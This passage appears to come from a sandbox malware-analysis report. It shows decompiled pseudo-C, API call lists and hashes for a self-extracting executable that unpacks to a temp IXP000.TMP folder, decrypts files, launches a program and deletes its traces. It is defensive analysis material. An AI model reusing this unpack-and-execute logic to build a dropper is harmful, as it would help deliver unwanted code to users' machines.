                                                                                                                                                                                                        								if(_t47 != _t47) {
                                                                                                                                                                                                        									_t40 = 4;
                                                                                                                                                                                                        									asm("int 0x29");
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						FreeLibrary(_t36);
                                                                                                                                                                                                        						_t58 =  *0xe88a24 - _t44; // 0x0
                                                                                                                                                                                                        						if(_t58 != 0) {
                                                                                                                                                                                                        							L14:
                                                                                                                                                                                                        							_t21 = SetCurrentDirectoryA("C:\Users\jones\AppData\Local\Temp\IXP000.TMP\"); // executed
                                                                                                                                                                                                        							if(_t21 != 0) {
                                                                                                                                                                                                        								__eflags =  *0xe88a2c - _t44; // 0x0
                                                                                                                                                                                                        								if(__eflags != 0) {
                                                                                                                                                                                                        									L20:
                                                                                                                                                                                                        									__eflags =  *0xe88d48 & 0x000000c0;
                                                                                                                                                                                                        									if(( *0xe88d48 & 0x000000c0) == 0) {
                                                                                                                                                                                                        										_t41 =  *0xe89a40; // 0x3, executed
                                                                                                                                                                                                        										_t26 = E00E8256D(_t41); // executed
                                                                                                                                                                                                        										_t44 = _t26;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t22 =  *0xe88a24; // 0x0
                                                                                                                                                                                                        									 *0xe89a44 = _t44;
                                                                                                                                                                                                        									__eflags = _t22;
                                                                                                                                                                                                        									if(_t22 != 0) {
                                                                                                                                                                                                        										L26:
                                                                                                                                                                                                        										__eflags =  *0xe88a38;
                                                                                                                                                                                                        										if( *0xe88a38 == 0) {
                                                                                                                                                                                                        											__eflags = _t22;
                                                                                                                                                                                                        											if(__eflags == 0) {
                                                                                                                                                                                                        												E00E84169(__eflags);
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_t12 = 1;
                                                                                                                                                                                                        										goto L17;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										__eflags =  *0xe89a30 - _t22; // 0x0
                                                                                                                                                                                                        										if(__eflags != 0) {
                                                                                                                                                                                                        											goto L26;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_t25 = E00E83BA2(); // executed
                                                                                                                                                                                                        										__eflags = _t25;
                                                                                                                                                                                                        										if(_t25 == 0) {
                                                                                                                                                                                                        											goto L16;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_t22 =  *0xe88a24; // 0x0
                                                                                                                                                                                                        										goto L26;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t27 = E00E83B26(_t40, _t44);
                                                                                                                                                                                                        								__eflags = _t27;
                                                                                                                                                                                                        								if(_t27 == 0) {
                                                                                                                                                                                                        									goto L16;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								goto L20;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t43 = 0x4bc;
                                                                                                                                                                                                        							E00E844B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                                                                                                                                                                                                        							 *0xe89124 = E00E86285();
                                                                                                                                                                                                        							goto L16;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t59 =  *0xe89a30 - _t44; // 0x0
                                                                                                                                                                                                        						if(_t59 != 0) {
                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t30 = E00E8621E(); // executed
                                                                                                                                                                                                        						if(_t30 == 0) {
                                                                                                                                                                                                        							goto L16;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						goto L14;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t49 =  *0xe88a24;
                                                                                                                                                                                                        				if( *0xe88a24 != 0) {
                                                                                                                                                                                                        					L4:
                                                                                                                                                                                                        					_t34 = E00E83A3F(_t51);
                                                                                                                                                                                                        					_t52 = _t34;
                                                                                                                                                                                                        					if(_t34 == 0) {
                                                                                                                                                                                                        						goto L16;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L5;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(E00E851E5(_t49) == 0) {
                                                                                                                                                                                                        					goto L16;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t51 =  *0xe88a38;
                                                                                                                                                                                                        				if( *0xe88a38 != 0) {
                                                                                                                                                                                                        					goto L5;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				goto L4;
                                                                                                                                                                                                        			}




























                                                                                                                                                                                                        0x00e8307c
                                                                                                                                                                                                        0x00e83081
                                                                                                                                                                                                        0x00e83087
                                                                                                                                                                                                        0x00e83089
                                                                                                                                                                                                        0x00e830a1
                                                                                                                                                                                                        0x00e830a1
                                                                                                                                                                                                        0x00e830a9
                                                                                                                                                                                                        0x00e830ab
                                                                                                                                                                                                        0x00e830ad
                                                                                                                                                                                                        0x00e830af
                                                                                                                                                                                                        0x00e830af
                                                                                                                                                                                                        0x00e830ad
                                                                                                                                                                                                        0x00e830b6
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8308b
                                                                                                                                                                                                        0x00e8308b
                                                                                                                                                                                                        0x00e83091
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83093
                                                                                                                                                                                                        0x00e83098
                                                                                                                                                                                                        0x00e8309a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8309c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8309c
                                                                                                                                                                                                        0x00e83089
                                                                                                                                                                                                        0x00e8305c
                                                                                                                                                                                                        0x00e83061
                                                                                                                                                                                                        0x00e83063
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83063
                                                                                                                                                                                                        0x00e8302b
                                                                                                                                                                                                        0x00e83032
                                                                                                                                                                                                        0x00e8303c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8303c
                                                                                                                                                                                                        0x00e83006
                                                                                                                                                                                                        0x00e8300c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8300e
                                                                                                                                                                                                        0x00e83015
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83015
                                                                                                                                                                                                        0x00e82f80
                                                                                                                                                                                                        0x00e82f3f
                                                                                                                                                                                                        0x00e82f46
                                                                                                                                                                                                        0x00e82f5f
                                                                                                                                                                                                        0x00e82f5f
                                                                                                                                                                                                        0x00e82f64
                                                                                                                                                                                                        0x00e82f66
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e82f66
                                                                                                                                                                                                        0x00e82f4f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e82f55
                                                                                                                                                                                                        0x00e82f5d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00E82F93
                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00E82FB2
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00E82FC6
                                                                                                                                                                                                        • DecryptFileA.ADVAPI32 ref: 00E82FE6
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00E82FF8
                                                                                                                                                                                                        • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00E8301C
                                                                                                                                                                                                          • Part of subcall function 00E851E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00E82F4D,?,00000002,00000000), ref: 00E85201
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                                        • API String ID: 2126469477-1173327654
                                                                                                                                                                                                        • Opcode ID: 7db9ae2b593a1076a5e86df937adf7b51083abf19633aaefdfa96de780ca0883
                                                                                                                                                                                                        • Instruction ID: 944d291a57b9e2a2f0f69a74c9be1369b89f4a3ab0f68027614c620a8472376c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7db9ae2b593a1076a5e86df937adf7b51083abf19633aaefdfa96de780ca0883
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 62410B31A006055EDB34BB729E4966A33E8EB44F49F0424A6EE0DF21D2EF74CE84CB51
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 522 e85467-e85484 523 e8548a-e85490 call e853a1 522->523 524 e8551c-e85528 call e81680 522->524 527 e85495-e85497 523->527 528 e8552d-e85539 call e858c8 524->528 529 e8549d-e854c0 call e81781 527->529 530 e85581-e85583 527->530 537 e8553b-e85545 CreateDirectoryA 528->537 538 e8554d-e85552 528->538 541 e8550c-e8551a call e8658a 529->541 542 e854c2-e854d8 GetSystemInfo 529->542 533 e8558d-e8559d call e86ce0 530->533 544 e85577-e8557c call e86285 537->544 545 e85547 537->545 539 e85554-e85557 call e8597d 538->539 540 e85585-e8558b 538->540 551 e8555c-e8555e 539->551 540->533 541->528 549 e854da-e854dd 542->549 550 e854fe 542->550 544->530 545->538 555 e854df-e854e2 549->555 556 e854f7-e854fc 549->556 552 e85503-e85507 call e8658a 550->552 551->540 557 e85560-e85566 551->557 552->541 559 e854f0-e854f5 555->559 560 e854e4-e854e7 555->560 556->552 557->530 562 e85568-e85575 RemoveDirectoryA 557->562 559->552 560->541 561 e854e9-e854ee 560->561 561->552 562->530
                                                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                                                        			E00E85467(CHAR* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				struct _SYSTEM_INFO _v304;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t10;
                                                                                                                                                                                                        				void* _t13;
                                                                                                                                                                                                        				intOrPtr _t14;
                                                                                                                                                                                                        				void* _t16;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				signed int _t26;
                                                                                                                                                                                                        				void* _t28;
                                                                                                                                                                                                        				void* _t29;
                                                                                                                                                                                                        				CHAR* _t48;
                                                                                                                                                                                                        				signed int _t49;
                                                                                                                                                                                                        				intOrPtr _t61;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t10 =  *0xe88004; // 0x18391fe1
                                                                                                                                                                                                        				_v8 = _t10 ^ _t49;
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				if(__edx == 0) {
                                                                                                                                                                                                        					_t48 = 0xe891e4;
                                                                                                                                                                                                        					_t42 = 0x104;
                                                                                                                                                                                                        					E00E81680(0xe891e4, 0x104);
                                                                                                                                                                                                        					L14:
                                                                                                                                                                                                        					_t13 = E00E858C8(_t48); // executed
                                                                                                                                                                                                        					if(_t13 != 0) {
                                                                                                                                                                                                        						L17:
                                                                                                                                                                                                        						_t42 = _a4;
                                                                                                                                                                                                        						if(_a4 == 0) {
                                                                                                                                                                                                        							L23:
                                                                                                                                                                                                        							 *0xe89124 = 0;
                                                                                                                                                                                                        							_t14 = 1;
                                                                                                                                                                                                        							L24:
                                                                                                                                                                                                        							return E00E86CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t16 = E00E8597D(_t48, _t42, 1, 0); // executed
                                                                                                                                                                                                        						if(_t16 != 0) {
                                                                                                                                                                                                        							goto L23;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t61 =  *0xe88a20; // 0x0
                                                                                                                                                                                                        						if(_t61 != 0) {
                                                                                                                                                                                                        							 *0xe88a20 = 0;
                                                                                                                                                                                                        							RemoveDirectoryA(_t48);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						L22:
                                                                                                                                                                                                        						_t14 = 0;
                                                                                                                                                                                                        						goto L24;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(CreateDirectoryA(_t48, 0) == 0) {
                                                                                                                                                                                                        						 *0xe89124 = E00E86285();
                                                                                                                                                                                                        						goto L22;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					 *0xe88a20 = 1;
                                                                                                                                                                                                        					goto L17;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t42 =  &_v268;
                                                                                                                                                                                                        				_t20 = E00E853A1(__ecx,  &_v268); // executed
                                                                                                                                                                                                        				if(_t20 == 0) {
                                                                                                                                                                                                        					goto L22;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				_t48 = 0xe891e4;
                                                                                                                                                                                                        				E00E81781(0xe891e4, 0x104, __ecx,  &_v268);
                                                                                                                                                                                                        				if(( *0xe89a34 & 0x00000020) == 0) {
                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                        					_t42 = 0x104;
                                                                                                                                                                                                        					E00E8658A(_t48, 0x104, 0xe81140);
                                                                                                                                                                                                        					goto L14;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				GetSystemInfo( &_v304);
                                                                                                                                                                                                        				_t26 = _v304.dwOemId & 0x0000ffff;
                                                                                                                                                                                                        				if(_t26 == 0) {
                                                                                                                                                                                                        					_push("i386");
                                                                                                                                                                                                        					L11:
                                                                                                                                                                                                        					E00E8658A(_t48, 0x104);
                                                                                                                                                                                                        					goto L12;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t28 = _t26 - 1;
                                                                                                                                                                                                        				if(_t28 == 0) {
                                                                                                                                                                                                        					_push("mips");
                                                                                                                                                                                                        					goto L11;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t29 = _t28 - 1;
                                                                                                                                                                                                        				if(_t29 == 0) {
                                                                                                                                                                                                        					_push("alpha");
                                                                                                                                                                                                        					goto L11;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t29 != 1) {
                                                                                                                                                                                                        					goto L12;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_push("ppc");
                                                                                                                                                                                                        				goto L11;
                                                                                                                                                                                                        			}





















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E854C9
                                                                                                                                                                                                        • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E8553D
                                                                                                                                                                                                        • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E8556F
                                                                                                                                                                                                          • Part of subcall function 00E853A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E853FB
                                                                                                                                                                                                          • Part of subcall function 00E853A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E85402
                                                                                                                                                                                                          • Part of subcall function 00E853A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E8541F
                                                                                                                                                                                                          • Part of subcall function 00E853A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E8542B
                                                                                                                                                                                                          • Part of subcall function 00E853A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E85434
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                                        • API String ID: 1979080616-3374052426
                                                                                                                                                                                                        • Opcode ID: 8ba49a47cb06ca4c9d05ce1f18d4626a0d64bcea879d1b2630f1e4a2505f2c1e
                                                                                                                                                                                                        • Instruction ID: f6521f717fbe4fa5b8823b66e32fbcadb26cccfe2956314c27b09381b3a4d1d8
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8ba49a47cb06ca4c9d05ce1f18d4626a0d64bcea879d1b2630f1e4a2505f2c1e
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 71312972B00B005FCB14BF3AAD455BF779FAB81744B0821AAA80EF2591DF70CE068795
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                                                        			E00E82390(CHAR* __ecx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v276;
                                                                                                                                                                                                        				char _v280;
                                                                                                                                                                                                        				char _v284;
                                                                                                                                                                                                        				struct _WIN32_FIND_DATAA _v596;
                                                                                                                                                                                                        				struct _WIN32_FIND_DATAA _v604;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t21;
                                                                                                                                                                                                        				int _t36;
                                                                                                                                                                                                        				void* _t46;
                                                                                                                                                                                                        				void* _t62;
                                                                                                                                                                                                        				void* _t63;
                                                                                                                                                                                                        				CHAR* _t65;
                                                                                                                                                                                                        				void* _t66;
                                                                                                                                                                                                        				signed int _t67;
                                                                                                                                                                                                        				signed int _t69;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                                                                                                                                                                        				_t21 =  *0xe88004; // 0x18391fe1
                                                                                                                                                                                                        				_t22 = _t21 ^ _t69;
                                                                                                                                                                                                        				_v8 = _t21 ^ _t69;
                                                                                                                                                                                                        				_t65 = __ecx;
                                                                                                                                                                                                        				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                                                                                                                                                                        					L10:
                                                                                                                                                                                                        					_pop(_t62);
                                                                                                                                                                                                        					_pop(_t66);
                                                                                                                                                                                                        					_pop(_t46);
                                                                                                                                                                                                        					return E00E86CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					E00E81680( &_v276, 0x104, __ecx);
                                                                                                                                                                                                        					_t58 = 0x104;
                                                                                                                                                                                                        					E00E816B3( &_v280, 0x104, "*");
                                                                                                                                                                                                        					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                                                                                                                                                                        					_t63 = _t22;
                                                                                                                                                                                                        					if(_t63 == 0xffffffff) {
                                                                                                                                                                                                        						goto L10;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						goto L3;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					do {
                                                                                                                                                                                                        						L3:
                                                                                                                                                                                                        						_t58 = 0x104;
                                                                                                                                                                                                        						E00E81680( &_v276, 0x104, _t65);
                                                                                                                                                                                                        						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                                                                                                                                                                        							_t58 = 0x104;
                                                                                                                                                                                                        							E00E816B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                                                                                                                                                                        							SetFileAttributesA( &_v280, 0x80);
                                                                                                                                                                                                        							DeleteFileA( &_v280);
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                                                                                                                                                                        								E00E816B3( &_v276, 0x104,  &(_v596.cFileName));
                                                                                                                                                                                                        								_t58 = 0x104;
                                                                                                                                                                                                        								E00E8658A( &_v280, 0x104, 0xe81140);
                                                                                                                                                                                                        								E00E82390( &_v284);
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                                                                                                                                                                        					} while (_t36 != 0);
                                                                                                                                                                                                        					FindClose(_t63); // executed
                                                                                                                                                                                                        					_t22 = RemoveDirectoryA(_t65); // executed
                                                                                                                                                                                                        					goto L10;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}






















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • FindFirstFileA.KERNELBASE(?,00E88A3A,00E811F4,00E88A3A,00000000,?,?), ref: 00E823F6
                                                                                                                                                                                                        • lstrcmpA.KERNEL32(?,00E811F8), ref: 00E82427
                                                                                                                                                                                                        • lstrcmpA.KERNEL32(?,00E811FC), ref: 00E8243B
                                                                                                                                                                                                        • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00E82495
                                                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00E824A3
                                                                                                                                                                                                        • FindNextFileA.KERNELBASE(00000000,00000010), ref: 00E824AF
                                                                                                                                                                                                        • FindClose.KERNELBASE(00000000), ref: 00E824BE
                                                                                                                                                                                                        • RemoveDirectoryA.KERNELBASE(00E88A3A), ref: 00E824C5
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 836429354-0
                                                                                                                                                                                                        • Opcode ID: 8b493b552decc041ce836f3d7d665da5636486134570914cdf112b4a0e943db9
                                                                                                                                                                                                        • Instruction ID: 0678f5b5acb939be746787a98c3e9b5dd6ca195b02e1c6114efb76ead3e4384c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8b493b552decc041ce836f3d7d665da5636486134570914cdf112b4a0e943db9
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 463192712047409FD320FB64DC8DAEB73ECABC4305F08592EB69DA6190EB34990D8762
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 675 e83fef-e84010 676 e8410a-e8411a call e86ce0 675->676 677 e84016-e8403b CreateProcessA 675->677 678 e84041-e8406e WaitForSingleObject GetExitCodeProcess 677->678 679 e840c4-e84101 call e86285 GetLastError FormatMessageA call e844b9 677->679 682 e84070-e84077 678->682 683 e84091 call e8411b 678->683 693 e84106 679->693 682->683 687 e84079-e8407b 682->687 688 e84096-e840b8 CloseHandle * 2 683->688 687->683 690 e8407d-e84089 687->690 691 e84108 688->691 692 e840ba-e840c0 688->692 690->683 694 e8408b 690->694 691->676 692->691 695 e840c2 692->695 693->691 694->683 695->693
                                                                                                                                                                                                        C-Code - Quality: 84%
                                                                                                                                                                                                        			E00E83FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v524;
                                                                                                                                                                                                        				long _v528;
                                                                                                                                                                                                        				struct _PROCESS_INFORMATION _v544;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t20;
                                                                                                                                                                                                        				void* _t22;
                                                                                                                                                                                                        				int _t25;
                                                                                                                                                                                                        				intOrPtr* _t39;
                                                                                                                                                                                                        				signed int _t44;
                                                                                                                                                                                                        				void* _t49;
                                                                                                                                                                                                        				signed int _t50;
                                                                                                                                                                                                        				intOrPtr _t53;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t45 = __edx;
                                                                                                                                                                                                        				_t20 =  *0xe88004; // 0x18391fe1
                                                                                                                                                                                                        				_v8 = _t20 ^ _t50;
                                                                                                                                                                                                        				_t39 = __ecx;
                                                                                                                                                                                                        				_t49 = 1;
                                                                                                                                                                                                        				_t22 = 0;
                                                                                                                                                                                                        				if(__ecx == 0) {
                                                                                                                                                                                                        					L13:
                                                                                                                                                                                                        					return E00E86CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                        				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                                                                                                                                                                        				if(_t25 == 0) {
                                                                                                                                                                                                        					 *0xe89124 = E00E86285();
                                                                                                                                                                                                        					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0); // executed
                                                                                                                                                                                                        					_t45 = 0x4c4;
                                                                                                                                                                                                        					E00E844B9(0, 0x4c4, _t39,  &_v524, 0x10, 0); // executed
                                                                                                                                                                                                        					L11:
                                                                                                                                                                                                        					_t49 = 0;
                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                        					_t22 = _t49;
                                                                                                                                                                                                        					goto L13;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                                                                                                                                                                        				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                                                                                                                                                                        				_t44 = _v528;
                                                                                                                                                                                                        				_t53 =  *0xe88a28; // 0x0
                                                                                                                                                                                                        				if(_t53 == 0) {
                                                                                                                                                                                                        					_t34 =  *0xe89a2c; // 0x0
                                                                                                                                                                                                        					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                                                                                                                                                                        						_t34 = _t44 & 0xff000000;
                                                                                                                                                                                                        						if((_t44 & 0xff000000) == 0xaa000000) {
                                                                                                                                                                                                        							 *0xe89a2c = _t44;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				E00E8411B(_t34, _t44);
                                                                                                                                                                                                        				CloseHandle(_v544.hThread);
